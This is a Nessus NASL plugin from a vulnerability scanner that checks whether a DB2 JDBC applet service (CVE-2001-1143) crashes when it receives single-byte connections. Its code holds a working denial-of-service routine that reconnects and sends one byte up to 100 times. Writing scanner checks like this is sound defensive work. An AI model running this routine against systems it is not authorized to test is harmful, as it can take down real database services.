#
# This script was written by Michel Arboi <arboi@alussinan.org>, starting 
# from miscflood.nasl
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10871);
 script_bugtraq_id(3010);
 script_version("$Revision: 1.10 $");
 script_cve_id("CVE-2001-1143");
 name["english"] = "DB2 DOS";
 script_name(english:name["english"]);
 
 desc["english"] = "
Synopsis :

The remote database service is prone to a denial of service attack. 

Description :

It was possible to crash the DB2 database service by connecting to the
affected service and sending just one byte to it. 

See also :

http://archives.neohapsis.com/archives/bugtraq/2001-07/0188.html

Solution: 

Contact the vendor for a patch.

Risk factor : 

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P)";

 script_description(english:desc["english"]);
 
 summary["english"] = "Flood against the remote service";
 script_summary(english:summary["english"]);
 
 script_category(ACT_DENIAL);
 
 script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi");
 family["english"] = "Denial of Service";

 script_family(english:family["english"]);

 script_dependencies("db2_jdbc_applet_server_detect.nasl");
 script_require_ports("Services/db2_jd");
 exit(0);
}

#

include("global_settings.inc");


function test_db2_port(port)
{
 local_var soc, i;

 if (! get_port_state(port))
  return(0);

 soc = open_sock_tcp(port);
 if (!soc)
  return(0);
 for (i=0; i<100; i=i+1)
 {
  send(socket:soc, data:string("x"));
  close(soc);

  soc = open_sock_tcp(port);
  if (! soc)
  {
   sleep(1);
   soc = open_sock_tcp(port);
   if (! soc)
   {
    security_warning(port);
    return (1);
   }
  }
 }
 close(soc);
 return(1);
}

port = get_kb_item("Services/db2_jd");
if (!port) exit(0);

test_db2_port(port:port);
if (report_paranoia > 1) test_db2_port(port:6790);
